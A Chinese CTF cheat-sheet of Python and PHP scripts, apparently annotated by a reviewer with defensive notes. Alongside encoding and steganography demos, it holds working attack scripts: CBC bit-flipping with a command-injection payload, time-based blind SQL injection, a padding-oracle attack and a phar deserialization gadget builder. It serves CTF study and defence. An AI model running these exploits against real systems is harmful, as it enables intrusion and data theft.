首先推荐这篇文章(网上有多次转载,这是我见过日期比较早的一个版本):《CTF中那些脑洞大开的编码和加密》
凯撒密码
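# Caesar shift demo: rotate lowercase ASCII letters by n positions.
# Every other character (braces, digits, uppercase) is copied unchanged.
# Ported from the Python 2 print statement so it runs on Python 3.
# NOTE: a Caesar shift has only 25 useful keys; it is an encoding exercise,
# not a way to keep data confidential.
flag = 'flag{abcdef}'
n = 20

c = ''.join(
    # Map the letter to 0..25, add the shift modulo 26, map back to a letter.
    chr((ord(ch) - ord('a') + n) % 26 + ord('a')) if 'a' <= ch <= 'z' else ch
    for ch in flag
)
print(c)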
栅栏密码
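# Rail-fence (column transposition) demo: encode, then decode again.
# Ported to Python 3 (print(), floor division) and split into two helpers so
# the key width is a parameter instead of a hard-coded constant.


def rail_encode(text, cols):
    """Return *text* read column by column from a grid that is *cols* wide.

    Character i of *text* sits in column ``i % cols``; the columns are
    concatenated from left to right.
    """
    return ''.join(text[x::cols] for x in range(cols))


def rail_decode(cipher, cols):
    """Invert :func:`rail_encode` for the same *cols*.

    Short columns are padded with '0' so the grid becomes rectangular, the
    grid is then read row by row and the padding is stripped by count, so a
    literal '0' inside the message is not affected.
    """
    cells = list(cipher)
    zero = (cols - len(cells)) % cols      # number of columns one cell short
    rows = (len(cells) + zero) // cols     # height of the padded grid
    if zero != 0:
        for i in range(1, zero):
            # Position counted from the front: the original negative index
            # (-rows*i+1) becomes 0 when rows == 1 and then padded the start
            # of the list instead of the end of the short column.
            cells.insert(len(cells) - rows * i + 1, '0')
        cells.append('0')
    plain = ''.join(''.join(cells[x::rows]) for x in range(rows))
    return plain[:-zero] if zero != 0 else plain


n = 5
m = "flag{0123456789abcdef}"
c = rail_encode(m, n)
print(c)

m = rail_decode(c, n)
print(m)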
曼彻斯特编码与解码
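# Manchester encoding / decoding demo.
# Convention used here: data bit 1 -> '10', data bit 0 -> '01'.
# Ported to Python 3: str.encode('hex'), the print statement, len(s)/2 inside
# range() and hex(...)[2:-1] (which relied on the Python 2 long suffix 'L')
# do not work there.
plaintext = 'flag{0123456789abcdef}'

# bin() drops the leading zero bit of the first byte, so `flag` is one bit
# short of a whole number of bytes.
flag = bin(int(plaintext.encode().hex(), 16))[2:]

# The leading '00' pair appears to stand in for that dropped zero bit. It is
# not a valid Manchester symbol; the decoder below maps any pair other than
# '10' to 0, which is why the round trip still works.
s = '00' + ''.join('10' if bit == '1' else '01' for bit in flag)
encoded = '%x' % int(s, 2)
print(encoded)
# 296969a56956696a6a9a5a555a565a595a5a5a655a665a695a6a5a955a9669566959695a6965696669696aa6

# Decode: walk the stream two characters at a time.
r = ''.join('1' if s[k:k + 2] == '10' else '0' for k in range(0, len(s), 2))
decoded = bytes.fromhex('%x' % int(r, 2)).decode()
print(decoded)
# flag{0123456789abcdef}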
差分曼彻斯特编码与解码
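# coding=utf-8
# Differential Manchester encoding / decoding demo.
# A data bit 1 repeats the previous pair reversed, a data bit 0 repeats the
# previous pair unchanged; the decoder therefore only compares the first half
# of each pair with the second half of the pair before it.
# Ported to Python 3 (no str.encode('hex'), print statement, xrange or
# hex(...)[2:-1] with the Python 2 long suffix).
plaintext = 'flag{0123456789abcdef}'

# bin() drops the leading zero bit of the first byte.
flag = bin(int(plaintext.encode().hex(), 16))[2:]

s = '01'  # or '10' -- seed pair, carries no data
for bit in flag:
    previous = s[-2:]
    s += previous[::-1] if bit == '1' else previous
encoded = '%x' % int(s, 2)
print(encoded)
# 6565659565569a99665959555956a6a55959596aa696a69aa69959aaa6569aa9655a9aa69a95656965656669

# Decode. Start at pair 1: the original loop started at pair 0 and compared
# s[0] with s[-1] (the last character of the stream, through negative
# indexing), so the first decoded bit depended on how the message ended.
# The seed pair has no predecessor and is skipped; int() ignores the missing
# leading zero.
r = ''
for i in range(1, len(s) // 2):
    r += '1' if s[i * 2] == s[i * 2 - 1] else '0'
decoded = bytes.fromhex('%x' % int(r, 2)).decode()
print(decoded)
# flag{0123456789abcdef}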
lsb隐写
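# coding=utf-8
# LSB steganography demo: write the bits of a short string into the lowest
# bit of every colour channel of the first pixels of an image.
# Ported to Python 3 (bytes literal, print()); the bare `except:` that was
# used to detect "payload exhausted" is replaced by an explicit index check.
# NOTE: LSB embedding only hides data, it does not protect it -- anyone who
# reads the low bits of new.png in row-major order recovers the payload.
from PIL import Image
import binascii
import random

im_path = 'timg.jpg'
# convert('RGB') guarantees that getpixel() returns an (r, g, b) triple even
# when the JPEG is greyscale or CMYK.
im = Image.open(im_path).convert('RGB')
width, height = im.size

# Step 1: copy of the cover image with a constant alpha value of 180.
# NOTE: the file is named new.bmp but is written in PNG format.
newImg = Image.new("RGBA", (width, height), (255, 255, 255, 120))
for i in range(height):
    for j in range(width):
        a, b, c = im.getpixel((j, i))
        newImg.putpixel((j, i), (a, b, c, 180))
newImg.save('new.bmp', 'PNG')

# Step 2: payload as a bit string, left-padded to a whole number of bytes.
# (-len) % 8 adds nothing when the length is already a multiple of 8; the
# original 8 - len % 8 added a full extra byte of zeros in that case.
flag = binascii.b2a_hex(b'flag{123456}')
flag = bin(int(flag, 16))[2:]
flag = '0' * (-len(flag) % 8) + flag
print(flag)

# Step 3: embed. Pixels are visited row by row; pixel number i*width+j
# carries payload bit number i*width+j in all three channels.
newImg = Image.new("RGB", (width, height), (0, 0, 0))
for i in range(height):
    for j in range(width):
        a, b, c = im.getpixel((j, i))
        index = i * width + j
        if index < len(flag):
            # Clear the low bit of each channel, then write the payload bit.
            bit = int(flag[index])
            newImg.putpixel((j, i), (a - a % 2 + bit, b - b % 2 + bit, c - c % 2 + bit))
            continue
        try:
            # Remaining pixels: randomise the parity of every channel.
            newImg.putpixel((j, i), (a - random.randint(0, 1),
                                     b - random.randint(0, 1),
                                     c - random.randint(0, 1)))
        except Exception:
            # Best effort, as in the original: keep the pixel unchanged if
            # the adjusted value is rejected.
            newImg.putpixel((j, i), (a, b, c))
newImg.save('new.png', 'PNG')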
cbc字节翻转攻击
# NOTE(review): this listing was collapsed onto one line together with its
# gutter numbers; line breaks are restored here and the statements are
# otherwise unchanged. Python 2 only (str.decode('hex'), print statement).
#
# CTF solution script for a CBC bit-flipping challenge. It works because the
# token is encrypted with CBC but not authenticated: XOR-ing a ciphertext
# block changes the next plaintext block in a predictable way, and the
# script treats the body of the first response as the resulting plaintext.
# Defensive takeaway: authenticate ciphertext (an AEAD mode, or
# encrypt-then-MAC verified before decryption) and never return decrypted
# data of an unverified token to the client.
import requests
# enc: 48-byte token; m: its known plaintext; fake: the 32 bytes the script
# wants the last two plaintext blocks to become.
enc='2363303cf2fae8b1bbe443fe2d12947e5abcf9c0ceb12ce5fd3a43504de0bf0621b9917a715dad17f828ff0ace6ec816'.decode('hex')
m='Welcome to the code system!This is a test string'
fake='uu=admin&ff=php://input&ccc=nl *'

# Step 1: rewrite bytes 16..31 of the token so that the block after them
# decrypts to fake[16:] instead of m[32:].
iv=enc[16:32]
m1=m[32:]
fake1=fake[16:]
fake_iv=''

for i in range(16):
    fake_iv+=chr(ord(iv[i])^ord(fake1[i])^ord(m1[i]))
enc=enc[:16]+fake_iv+enc[32:]

# The response body is used below as the plaintext of the modified token.
m=requests.get('http://race.taropowder.cn:20002/?s='+enc.encode('hex')).content

# Step 2: same XOR on bytes 0..15, using the plaintext block just read back
# (m[16:32]) and the first half of `fake`.
iv=enc[:16]
m2=m[16:32]
fake2=fake[:16]

fake_iv=''
for i in range(16):
    fake_iv+=chr(ord(iv[i])^ord(fake2[i])^ord(m2[i]))
enc=fake_iv+enc[16:]

m=requests.post('http://race.taropowder.cn:20002/?s='+enc.encode('hex'),data='phpinfo').content

print m
flask session伪造
# NOTE(review): this listing was collapsed onto one line together with its
# gutter numbers; line breaks are restored here and the statements are
# otherwise unchanged.
#
# Helper app for the session-forgery topic of this section: visiting '/'
# makes Flask issue a session cookie holding username/isadmin, signed with
# the key configured below.
from flask import Flask, session
import uuid
import urllib.request
app = Flask(__name__)
# Flask's default session is a client-side cookie that is signed, not
# encrypted, with SECRET_KEY. Anyone who knows or guesses the key can
# produce a cookie the application accepts, so a real deployment needs a
# long random key (for example from secrets.token_hex) kept out of the
# source, and server-side checks for privileges such as "isadmin".
app.config['SECRET_KEY']='123456'


@app.route('/')
def index():
    # Values written into the signed session cookie.
    session['username']='user'
    session['isadmin']='1'
    return 'hello'

if __name__ == "__main__":
    # NOTE(review): debug=True together with host="0.0.0.0" serves the
    # Werkzeug debugger on every network interface; bind to 127.0.0.1 when
    # this is only run locally.
    app.run(debug=True,port=8000,host="0.0.0.0")
RSA demo
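# Textbook RSA decryption demo with known primes.
# Ported to Python 3 and to the standard library: the wildcard gmpy2 import,
# long(), the print statement and str.decode('hex') are gone; the modular
# inverse comes from the built-in pow(e, -1, x) (Python 3.8+).
# NOTE(review): p and q as printed differ only in their last three digits
# (...927 vs ...447). A modulus built from primes this close together can be
# factored from n alone with Fermat's method, so real keys need independently
# generated primes. This demo also uses no padding (OAEP), which real RSA
# encryption requires.
e = 65537
p = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848927
q = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848447
n = p * q
c = 631583911592660652215412683088688785438938386403323323131247534561958531288570612134139288090533619548876156447498627938626419617968918299212863936839701943643735437264304062828205809984533592547599060829451668240569384130130080928292082888526567902695707215660020201392640388518379063244487204881439591813398495285025704285781072987024698133147354238702861803146548057736756003294248791827782280722670457157385205787259979804892966529536902959813675537028879407802365439024711942091123058305460856676910458268097798532901040050506906141547909766093323197363034959926900440420805768716029052885452560625308314284406

# x is Euler's totient of n for distinct primes p and q.
x = (p - 1) * (q - 1)
# Private exponent: inverse of e modulo x (raises ValueError if none exists).
d = pow(e, -1, x)
m = pow(c, d, n)

# Convert the integer to bytes by length instead of through a hex string,
# which failed whenever the hex form had an odd number of digits.
plaintext = m.to_bytes((m.bit_length() + 7) // 8, 'big')
print(plaintext.decode('utf-8', errors='replace'))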
SQL注入辅助
# NOTE(review): this listing was collapsed onto one line; the line breaks and
# indentation below are reconstructed from the syntax (the position of the
# final print in particular is a guess) and the statements are otherwise
# unchanged. Python 2 only (integer `/`, print statement).
#
# Time-based blind SQL injection helper for a practice-lab URL
# ("Less-10" on a private address). For each character position it runs a
# binary search over the character code and decides each step from how long
# the request took.
# Defensive takeaway: the parameter is presumably concatenated into the SQL
# text; bound parameters (prepared statements) remove the injection. In
# logs this shows up as bursts of near-identical requests containing
# substr()/sleep() with response times that fall into two clusters.
import requests
import time
url='http://172.16.124.149/Less-10/?id='
flag=''
for i in range(1,20):
    # Search interval for the character code at position i.
    left=33
    right=128
    while right-left!=1:
        mid=(left+right)/2
        payload='0"^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23'.format(i=i,mid=hex(mid))
        # The elapsed time of the request is the only signal that is read.
        t1=time.time()
        r=requests.get(url=url+payload)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag
phar反序列化demo
<?php
// NOTE(review): this listing was collapsed onto one line; line breaks are
// restored here, the original comments are translated, and the statements are
// otherwise unchanged.
//
// Generator for a phar archive whose metadata holds a serialized object.
// Defensive takeaway: before PHP 8.0 the phar:// stream wrapper unserialized
// this metadata implicitly when a filesystem function touched the archive,
// which ran magic methods such as __destruct. Do not pass user-controlled
// paths or schemes to filesystem functions, unregister the phar wrapper if
// it is not needed, and do not judge uploads by their magic bytes alone.

// Put the class of the object to be deserialized here
class foo
{
    var $ha = 'echo "ok";';

    // eval() of a property in a destructor is what makes this class usable
    // as a deserialization gadget.
    function __destruct()
    {
        eval($this->ha);
    }
}

// Build the corresponding exploitable object
$o = new foo();
$o->ha='echo "error";';

@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); // set the stub; the GIF header is prepended to fool file-type detection
$phar->setMetadata($o); // store the custom metadata in the manifest
$phar->addFromString("test.txt", "test"); // add the file to be archived
// the signature is computed automatically
$phar->stopBuffering();
?>
padding oracle
# NOTE(review): this listing was collapsed onto one line; the line breaks and
# indentation below are reconstructed from the syntax and should be checked
# against the author's original. Statements are otherwise unchanged.
# Python 2 only (str.encode('base64'), urllib.quote, print statement).
#
# CTF solution script for a padding-oracle challenge. The only signal it
# reads is whether the word 'Error' appears in the page returned for a given
# 'token' cookie; that one bit per request is the oracle.
# Defensive takeaway: authenticate the token (an AEAD mode, or
# encrypt-then-MAC checked before decryption) so that modified ciphertext is
# rejected before any padding check, and return the same response for every
# kind of token failure. In logs this appears as many requests from one
# session that differ only in the token cookie.
import requests
import urllib
host='124.193.74.211'
port='55769'
#host='127.0.0.1'
#port='80'
url='http://%s:%s/login.php'%(host,port)
session = requests.session()
session.post(url=url,data={'username':'admin','password':'admin'})

# im collects one value (j^i) per position for which the response did not
# contain 'Error'.
im=[]
for i in range(1,17):
    try:
        s=''
        xx=''
        # Tail built from the values already collected, XOR-ed with i.
        for j in im[::-1]:
            xx+=chr(i^j)
        for j in range(256):
            s='xff'*(16-i)+chr(j)+xx
            s=s.encode('base64')
            session.cookies.set('token',urllib.quote(s),domain=host,path='/')
            x=session.get(url).text
            if 'Error' not in x:
                im.append(j^i)
                print s.decode('base64').encode('hex')
                break
        print im
    except Exception as e:
        print e,' '

# Second pass: one more byte is searched with the opposite test ('Error'
# present in the response).
for j in range(256):
    s='x0f'*15
    token=''
    for i in range(15):
        token+=chr(im[::-1][i]^ord(s[i]))
    token=chr(j)+token
    token=token.encode('base64')
    session.cookies.set('token',urllib.quote(token),domain=host,path='/')
    x=session.get(url).text
    if 'Error' in x:
        im.append(j^ord('0'))
        print im
        break

# Final request: XOR the collected values with the chosen 16-byte plaintext
# ('onepiece' followed by eight bytes of value 8, presumably PKCS#7-style
# padding) and send the result as the token.
im=im[::-1]
s='onepiece'+chr(8)*8
token=''
for i in range(16):
    token+=chr(im[i]^ord(s[i]))
token=token.encode('base64')[:-1]
session.cookies.set('token',urllib.quote(token),domain=host,path='/')
x=session.get(url).text
print session.cookies,x
爆破图片crc
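# Recover the width and height of a PNG whose IHDR dimensions were altered,
# by searching for the pair that reproduces the CRC stored in the file.
# Ported to Python 3 (bytes, print()), and moved into a function with a
# __main__ guard so the search bounds and the target CRC are parameters.
import binascii
import struct


def find_png_dimensions(target_crc=0x53d1578a,
                        ihdr_tail=b'\x08\x02\x00\x00\x00',
                        max_width=16 ** 4,
                        max_height=16 ** 4):
    """Yield every (width, height) whose IHDR chunk has CRC *target_crc*.

    The CRC of a PNG chunk covers the chunk type and its data, here
    ``b'IHDR' + width + height + ihdr_tail`` with both dimensions as 32-bit
    big-endian integers. *ihdr_tail* is the five bytes that follow the
    dimensions (bit depth, colour type, compression, filter, interlace);
    the default is the value hard-coded in the original script.
    Widths ``0 .. max_width-1`` and heights ``0 .. max_height-1`` are tried.
    """
    # The height-dependent suffixes are the same for every width.
    tails = [struct.pack('>I', height) + ihdr_tail for height in range(max_height)]
    for width in range(max_width):
        # CRC of the part that does not depend on the height, computed once
        # per width and then continued for each candidate height.
        head_crc = binascii.crc32(b'IHDR' + struct.pack('>I', width))
        for height, tail in enumerate(tails):
            if binascii.crc32(tail, head_crc) & 0xffffffff == target_crc:
                yield width, height


if __name__ == '__main__':
    for x, y in find_png_dimensions():
        print('x:', '%04x' % x, 'y:', '%04x' % y, 'crc:', '53d1578a')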